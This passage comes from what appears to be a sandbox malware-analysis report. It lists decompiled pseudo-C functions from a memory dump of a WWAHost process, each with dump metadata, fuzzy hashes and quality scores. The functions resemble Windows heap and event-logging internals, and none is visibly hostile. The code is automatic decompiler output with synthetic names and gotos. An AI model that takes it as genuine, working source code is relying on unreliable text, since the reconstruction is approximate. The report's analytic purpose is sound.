                                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              							} else {
                                              								_t56 = 0x7ffe0386;
                                              							}
                                              							__eflags =  *_t56;
                                              							if( *_t56 != 0) {
                                              								_t56 = E03A28B58(_t82);
                                              							}
                                              							__eflags =  *((char*)(_t85 - 0x1d));
                                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                                              								__eflags = _t82 -  *0x3a486c0; // 0xb507b0
                                              								if(__eflags != 0) {
                                              									__eflags = _t82 -  *0x3a486b8; // 0x0
                                              									if(__eflags == 0) {
                                              										_t79 = 0x3a486bc;
                                              										_t72 = 0x3a486b8;
                                              										goto L18;
                                              									}
                                              									__eflags = _t56 | 0xffffffff;
                                              									asm("lock xadd [edi], eax");
                                              									if(__eflags == 0) {
                                              										E03959240(_t68, _t82, _t82, _t84, __eflags);
                                              									}
                                              								} else {
                                              									_t79 = 0x3a486c4;
                                              									_t72 = 0x3a486c0;
                                              									L18:
                                              									E03989B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                              								}
                                              							}
                                              							goto L5;
                                              						}
                                              					}
                                              				}
                                              			}



















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c2f49473634b63b1b599421200cdd0baef2973b2a6c667d036ebae10d59943
                                              • Instruction ID: d83c312a486836d515e1b9fdccd1e4f86c059930eb5b8c16bd62188ce5adc0ca
                                              • Opcode Fuzzy Hash: 67c2f49473634b63b1b599421200cdd0baef2973b2a6c667d036ebae10d59943
                                              • Instruction Fuzzy Hash: 4A31D879900755DFEB25DB6CC58879DFBF9BB85390F1C8149E8056B240C339A9C0CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 60%
                                              			E03981DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr* _v20;
                                              				void* _t22;
                                              				char _t23;
                                              				void* _t36;
                                              				intOrPtr _t42;
                                              				intOrPtr _t43;
                                              
                                              				_v12 = __ecx;
                                              				_t43 = 0;
                                              				_v20 = __edx;
                                              				_t42 =  *__edx;
                                              				 *__edx = 0;
                                              				_v16 = _t42;
                                              				_push( &_v8);
                                              				_push(0);
                                              				_push(0);
                                              				_push(6);
                                              				_push(0);
                                              				_push(__ecx);
                                              				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                              				_push(_t36);
                                              				_t22 = E0397F460();
                                              				if(_t22 < 0) {
                                              					if(_t22 == 0xc0000023) {
                                              						goto L1;
                                              					}
                                              					L3:
                                              					return _t43;
                                              				}
                                              				L1:
                                              				_t23 = _v8;
                                              				if(_t23 != 0) {
                                              					_t38 = _a4;
                                              					if(_t23 >  *_a4) {
                                              						_t42 = L03974620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                              						if(_t42 == 0) {
                                              							goto L3;
                                              						}
                                              						_t23 = _v8;
                                              					}
                                              					_push( &_v8);
                                              					_push(_t23);
                                              					_push(_t42);
                                              					_push(6);
                                              					_push(_t43);
                                              					_push(_v12);
                                              					_push(_t36);
                                              					if(E0397F460() < 0) {
                                              						if(_t42 != 0 && _t42 != _v16) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                              						}
                                              						goto L3;
                                              					}
                                              					 *_v20 = _t42;
                                              					 *_a4 = _v8;
                                              				}
                                              				_t43 = 1;
                                              				goto L3;
                                              			}













                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction ID: 229719d66424aa466da573bc0b337b2b59bf2b82dad45802860748b93331cf3a
                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                              • Instruction Fuzzy Hash: 92219C76600218EBC720EF99CC84EAAFBBDFFC5680F154055E901DB261D630AE02CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			E03970050(void* __ecx) {
                                              				signed int _v8;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr* _t30;
                                              				intOrPtr* _t31;
                                              				signed int _t34;
                                              				void* _t40;
                                              				void* _t41;
                                              				signed int _t44;
                                              				intOrPtr _t47;
                                              				signed int _t58;
                                              				void* _t59;
                                              				void* _t61;
                                              				void* _t62;
                                              				signed int _t64;
                                              
                                              				_push(__ecx);
                                              				_v8 =  *0x3a4d360 ^ _t64;
                                              				_t61 = __ecx;
                                              				_t2 = _t61 + 0x20; // 0x20
                                              				E03989ED0(_t2, 1, 0);
                                              				_t52 =  *(_t61 + 0x8c);
                                              				_t4 = _t61 + 0x8c; // 0x8c
                                              				_t40 = _t4;
                                              				do {
                                              					_t44 = _t52;
                                              					_t58 = _t52 & 0x00000001;
                                              					_t24 = _t44;
                                              					asm("lock cmpxchg [ebx], edx");
                                              					_t52 = _t44;
                                              				} while (_t52 != _t44);
                                              				if(_t58 == 0) {
                                              					L7:
                                              					_pop(_t59);
                                              					_pop(_t62);
                                              					_pop(_t41);
                                              					return E0399B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                              				}
                                              				asm("lock xadd [esi], eax");
                                              				_t47 =  *[fs:0x18];
                                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                              				if(_t30 != 0) {
                                              					if( *_t30 == 0) {
                                              						goto L4;
                                              					}
                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              					L5:
                                              					if( *_t31 != 0) {
                                              						_t18 = _t61 + 0x78; // 0x78
                                              						E03A28A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                              					}
                                              					_t52 =  *(_t61 + 0x5c);
                                              					_t11 = _t61 + 0x78; // 0x78
                                              					_t34 = E03989702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                              					_t24 = _t34 | 0xffffffff;
                                              					asm("lock xadd [esi], eax");
                                              					if((_t34 | 0xffffffff) == 0) {
                                              						 *0x3a4b1e0(_t61);
                                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                              					}
                                              					goto L7;
                                              				}
                                              				L4:
                                              				_t31 = 0x7ffe0386;
                                              				goto L5;
                                              			}





















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7af18430bb7bb7cfdb4b06a47b2619d0625acf7d1ba31dcc47b7ce5ad7faea68
                                              • Instruction ID: 50f611e26908360a76bfaf9b5b7555fd660a53bd6cbff8b8604a01d84ddc0211
                                              • Opcode Fuzzy Hash: 7af18430bb7bb7cfdb4b06a47b2619d0625acf7d1ba31dcc47b7ce5ad7faea68
                                              • Instruction Fuzzy Hash: CB318F35201B04CFDB21DF28C940B96B3E9FF88764F18456DE49687B90EB35A801CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E039D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                              				signed short* _v8;
                                              				signed char _v12;
                                              				void* _t22;
                                              				signed char* _t23;
                                              				intOrPtr _t24;
                                              				signed short* _t44;
                                              				void* _t47;
                                              				signed char* _t56;
                                              				signed char* _t58;
                                              
                                              				_t48 = __ecx;
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t44 = __ecx;
                                              				_v12 = __edx;
                                              				_v8 = __ecx;
                                              				_t22 = E03977D50();
                                              				_t58 = 0x7ffe0384;
                                              				if(_t22 == 0) {
                                              					_t23 = 0x7ffe0384;
                                              				} else {
                                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              				}
                                              				if( *_t23 != 0) {
                                              					_t24 =  *0x3a47b9c; // 0x0
                                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                              					_t23 = L03974620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                              					_t56 = _t23;
                                              					if(_t56 != 0) {
                                              						_t56[0x24] = _a4;
                                              						_t56[0x28] = _a8;
                                              						_t56[6] = 0x1420;
                                              						_t56[0x20] = _v12;
                                              						_t14 =  &(_t56[0x2c]); // 0x2c
                                              						E0399F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                              						if(E03977D50() != 0) {
                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              						}
                                              						_push(_t56);
                                              						_push(_t47 - 0x20);
                                              						_push(0x402);
                                              						_push( *_t58 & 0x000000ff);
                                              						E03999AE0();
                                              						_t23 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                              					}
                                              				}
                                              				return _t23;
                                              			}













                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2646db8b7cca36658d84b256d83bdb3e9a86f725759069941a49e0a1665be6
                                              • Instruction ID: c2e84a8ca4d13d76972d882952d5ca945a5d8a97381c2126aa295aeb6a509373
                                              • Opcode Fuzzy Hash: bb2646db8b7cca36658d84b256d83bdb3e9a86f725759069941a49e0a1665be6
                                              • Instruction Fuzzy Hash: 4621ABB5A00644AFD711DBA8D881F6AB7B8FF88740F04406AF905CB791E735ED11CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E039990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                              				intOrPtr* _v0;
                                              				void* _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				char _v36;
                                              				void* _t38;
                                              				intOrPtr _t41;
                                              				void* _t44;
                                              				signed int _t45;
                                              				intOrPtr* _t49;
                                              				signed int _t57;
                                              				signed int _t58;
                                              				intOrPtr* _t59;
                                              				void* _t62;
                                              				void* _t63;
                                              				void* _t65;
                                              				void* _t66;
                                              				signed int _t69;
                                              				intOrPtr* _t70;
                                              				void* _t71;
                                              				intOrPtr* _t72;
                                              				intOrPtr* _t73;
                                              				char _t74;
                                              
                                              				_t65 = __edx;
                                              				_t57 = _a4;
                                              				_t32 = __ecx;
                                              				_v8 = __edx;
                                              				_t3 = _t32 + 0x14c; // 0x14c
                                              				_t70 = _t3;
                                              				_v16 = __ecx;
                                              				_t72 =  *_t70;
                                              				while(_t72 != _t70) {
                                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                              						L24:
                                              						_t72 =  *_t72;
                                              						continue;
                                              					}
                                              					_t30 = _t72 + 0x10; // 0x10
                                              					if(E039AD4F0(_t30, _t65, _t57) == _t57) {
                                              						return 0xb7;
                                              					}
                                              					_t65 = _v8;
                                              					goto L24;
                                              				}
                                              				_t61 = _t57;
                                              				_push( &_v12);
                                              				_t66 = 0x10;
                                              				if(E0398E5E0(_t57, _t66) < 0) {
                                              					return 0x216;
                                              				}
                                              				_t73 = L03974620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                              				if(_t73 == 0) {
                                              					_t38 = 0xe;
                                              					return _t38;
                                              				}
                                              				_t9 = _t73 + 0x10; // 0x10
                                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                              				E0399F3E0(_t9, _v8, _t57);
                                              				_t41 =  *_t70;
                                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                              					_t62 = 3;
                                              					asm("int 0x29");
                                              					_push(_t62);
                                              					_push(_t57);
                                              					_push(_t73);
                                              					_push(_t70);
                                              					_t71 = _t62;
                                              					_t74 = 0;
                                              					_v36 = 0;
                                              					_t63 = E0398A2F0(_t62, _t71, 1, 6,  &_v36);
                                              					if(_t63 == 0) {
                                              						L20:
                                              						_t44 = 0x57;
                                              						return _t44;
                                              					}
                                              					_t45 = _v12;
                                              					_t58 = 0x1c;
                                              					if(_t45 < _t58) {
                                              						goto L20;
                                              					}
                                              					_t69 = _t45 / _t58;
                                              					if(_t69 == 0) {
                                              						L19:
                                              						return 0xe8;
                                              					}
                                              					_t59 = _v0;
                                              					do {
                                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                              							goto L18;
                                              						}
                                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                              						 *_t59 = _t49;
                                              						if( *_t49 != 0x53445352) {
                                              							goto L18;
                                              						}
                                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                              						return 0;
                                              						L18:
                                              						_t63 = _t63 + 0x1c;
                                              						_t74 = _t74 + 1;
                                              					} while (_t74 < _t69);
                                              					goto L19;
                                              				}
                                              				 *_t73 = _t41;
                                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                              				 *_t70 = _t73;
                                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                              				return 0;
                                              			}



























                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction ID: 75cfe3bea075928e54d572f2759b6dc4f5383af7f0bb24661ccbae41be049609
                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction Fuzzy Hash: 6F215075A00305EFEB30DF59C845A6AF7F8EB48750F15886BE945AB250D330ED40CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 59%
                                              			E03983B7A(void* __ecx) {
                                              				signed int _v8;
                                              				char _v12;
                                              				intOrPtr _v20;
                                              				intOrPtr _t17;
                                              				intOrPtr _t26;
                                              				void* _t35;
                                              				void* _t38;
                                              				void* _t41;
                                              				intOrPtr _t44;
                                              
                                              				_t17 =  *0x3a484c4; // 0x0
                                              				_v12 = 1;
                                              				_v8 =  *0x3a484c0 * 0x4c;
                                              				_t41 = __ecx;
                                              				_t35 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x3a484c0 * 0x4c);
                                              				if(_t35 == 0) {
                                              					_t44 = 0xc0000017;
                                              				} else {
                                              					_push( &_v8);
                                              					_push(_v8);
                                              					_push(_t35);
                                              					_push(4);
                                              					_push( &_v12);
                                              					_push(0x6b);
                                              					_t44 = E0399AA90();
                                              					_v20 = _t44;
                                              					if(_t44 >= 0) {
                                              						E0399FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x3a484c0 * 0xc);
                                              						_t38 = _t35;
                                              						if(_t35 < _v8 + _t35) {
                                              							do {
                                              								asm("movsd");
                                              								asm("movsd");
                                              								asm("movsd");
                                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                              							} while (_t38 < _v8 + _t35);
                                              							_t44 = _v20;
                                              						}
                                              					}
                                              					_t26 =  *0x3a484c4; // 0x0
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                              				}
                                              				return _t44;
                                              			}













                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4c56adbecf61ee1ee3550b8fafeb2d8db8f9296e75edfc493bb4626f5c8131f
                                              • Instruction ID: 4b1f0169aa9bb8939678509198b6d57e96de71c0d860c97157f826841278ff84
                                              • Opcode Fuzzy Hash: d4c56adbecf61ee1ee3550b8fafeb2d8db8f9296e75edfc493bb4626f5c8131f
                                              • Instruction Fuzzy Hash: CD219276A00109EFDB00EF58DD81B6AB7BDFB84748F150069E905AB251D376ED02CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 80%
                                              			E039D6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                              				char _v8;
                                              				char _v12;
                                              				char _v16;
                                              				char _v20;
                                              				char _v28;
                                              				char _v36;
                                              				char _v52;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed char* _t21;
                                              				void* _t24;
                                              				void* _t36;
                                              				void* _t38;
                                              				void* _t46;
                                              
                                              				_push(_t36);
                                              				_t46 = __edx;
                                              				_v12 = 0;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v16 = 0;
                                              				if(E03977D50() == 0) {
                                              					_t21 = 0x7ffe0384;
                                              				} else {
                                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                              				}
                                              				if( *_t21 != 0) {
                                              					_t21 =  *[fs:0x30];
                                              					if((_t21[0x240] & 0x00000004) != 0) {
                                              						if(E03977D50() == 0) {
                                              							_t21 = 0x7ffe0385;
                                              						} else {
                                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                              						}
                                              						if(( *_t21 & 0x00000020) != 0) {
                                              							_t56 = _t46;
                                              							if(_t46 == 0) {
                                              								_t46 = 0x3935c80;
                                              							}
                                              							_push(_t46);
                                              							_push( &_v12);
                                              							_t24 = E0398F6E0(_t36, 0, _t46, _t56);
                                              							_push(_a4);
                                              							_t38 = _t24;
                                              							_push( &_v28);
                                              							_t21 = E0398F6E0(_t38, 0, _t46, _t56);
                                              							if(_t38 != 0) {
                                              								if(_t21 != 0) {
                                              									E039D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                              									L03972400( &_v52);
                                              								}
                                              								_t21 = L03972400( &_v28);
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t21;
                                              			}




















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03d004497b93adf4b24576e71c177f1dc9e8c0b87c815bb02198786d07689cd3
                                              • Instruction ID: 90fba4ca70656a8261fd390ef5d4d129221dba48d672a214fb381b7fe842759f
                                              • Opcode Fuzzy Hash: 03d004497b93adf4b24576e71c177f1dc9e8c0b87c815bb02198786d07689cd3
                                              • Instruction Fuzzy Hash: 1A21F2735003489BC321EF68ED45B6BB7ECEFC5680F494956F940DB290E734C908C6A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 67%
                                              			E03A2070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                              				char _v8;
                                              				intOrPtr _v11;
                                              				signed int _v12;
                                              				intOrPtr _v15;
                                              				signed int _v16;
                                              				intOrPtr _v28;
                                              				void* __ebx;
                                              				char* _t32;
                                              				signed int* _t38;
                                              				signed int _t60;
                                              
                                              				_t38 = __ecx;
                                              				_v16 = __edx;
                                              				_t60 = E03A207DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                              				if(_t60 != 0) {
                                              					_t7 = _t38 + 0x38; // 0x29cd5903
                                              					_push( *_t7);
                                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                                              					_push( *_t9);
                                              					_v12 = _a8 << 0xc;
                                              					_t11 = _t38 + 4; // 0x5de58b5b
                                              					_push(0x4000);
                                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                              					E03A1AFDE( &_v8,  &_v12);
                                              					E03A21293(_t38, _v28, _t60);
                                              					if(E03977D50() == 0) {
                                              						_t32 = 0x7ffe0380;
                                              					} else {
                                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              					}
                                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                              						E03A114FB(_t38,  *_t21, _v11, _v15, 0xd);
                                              					}
                                              				}
                                              				return  ~_t60;
                                              			}














                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction ID: fc57af051d578e8f12f0ddef1a7441aea73723f6797c33beacc1d166dab52f11
                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction Fuzzy Hash: CF21F23A204A109FD705DF1CC880A6ABBA5EFD5750F08856EF9958F381D730D919CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E039D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _t21;
                                              				void* _t24;
                                              				intOrPtr _t25;
                                              				void* _t36;
                                              				short _t39;
                                              				signed char* _t42;
                                              				unsigned int _t46;
                                              				void* _t50;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t21 =  *0x3a47b9c; // 0x0
                                              				_t46 = _a8;
                                              				_v12 = __edx;
                                              				_v8 = __ecx;
                                              				_t4 = _t46 + 0x2e; // 0x2e
                                              				_t36 = _t4;
                                              				_t24 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                              				_t50 = _t24;
                                              				if(_t50 != 0) {
                                              					_t25 = _a4;
                                              					if(_t25 == 5) {
                                              						L3:
                                              						_t39 = 0x14b1;
                                              					} else {
                                              						_t39 = 0x14b0;
                                              						if(_t25 == 6) {
                                              							goto L3;
                                              						}
                                              					}
                                              					 *((short*)(_t50 + 6)) = _t39;
                                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                              					_t11 = _t50 + 0x2c; // 0x2c
                                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                              					E0399F3E0(_t11, _a12, _t46);
                                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                              					if(E03977D50() == 0) {
                                              						_t42 = 0x7ffe0384;
                                              					} else {
                                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              					}
                                              					_push(_t50);
                                              					_t19 = _t36 - 0x20; // 0xe
                                              					_push(0x403);
                                              					_push( *_t42 & 0x000000ff);
                                              					E03999AE0();
                                              					_t24 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                              				}
                                              				return _t24;
                                              			}














                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5cff106598dbb0309cec434840759cdfdd7e3bcdd58446cb5a8a180442ca0d5d
                                              • Instruction ID: 05e8b86596b361e91cdaea0e50eaf1279f46592ad0021714548947692578914d
                                              • Opcode Fuzzy Hash: 5cff106598dbb0309cec434840759cdfdd7e3bcdd58446cb5a8a180442ca0d5d
                                              • Instruction Fuzzy Hash: A8219F76500644ABC725DFA9D881E6BB7ACEF88380F14456DE50ACB650D634E900CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E0397AE73(intOrPtr __ecx, void* __edx) {
                                              				intOrPtr _v8;
                                              				void* _t19;
                                              				char* _t22;
                                              				signed char* _t24;
                                              				intOrPtr _t25;
                                              				intOrPtr _t27;
                                              				void* _t31;
                                              				intOrPtr _t36;
                                              				char* _t38;
                                              				signed char* _t42;
                                              
                                              				_push(__ecx);
                                              				_t31 = __edx;
                                              				_v8 = __ecx;
                                              				_t19 = E03977D50();
                                              				_t38 = 0x7ffe0384;
                                              				if(_t19 != 0) {
                                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              				} else {
                                              					_t22 = 0x7ffe0384;
                                              				}
                                              				_t42 = 0x7ffe0385;
                                              				if( *_t22 != 0) {
                                              					if(E03977D50() == 0) {
                                              						_t24 = 0x7ffe0385;
                                              					} else {
                                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              					}
                                              					if(( *_t24 & 0x00000010) != 0) {
                                              						goto L17;
                                              					} else {
                                              						goto L3;
                                              					}
                                              				} else {
                                              					L3:
                                              					_t27 = E03977D50();
                                              					if(_t27 != 0) {
                                              						_t27 =  *[fs:0x30];
                                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                              					}
                                              					if( *_t38 != 0) {
                                              						_t27 =  *[fs:0x30];
                                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                              							goto L5;
                                              						}
                                              						_t27 = E03977D50();
                                              						if(_t27 != 0) {
                                              							_t27 =  *[fs:0x30];
                                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                              						}
                                              						if(( *_t42 & 0x00000020) != 0) {
                                              							L17:
                                              							_t25 = _v8;
                                              							_t36 = 0;
                                              							if(_t25 != 0) {
                                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                              							}
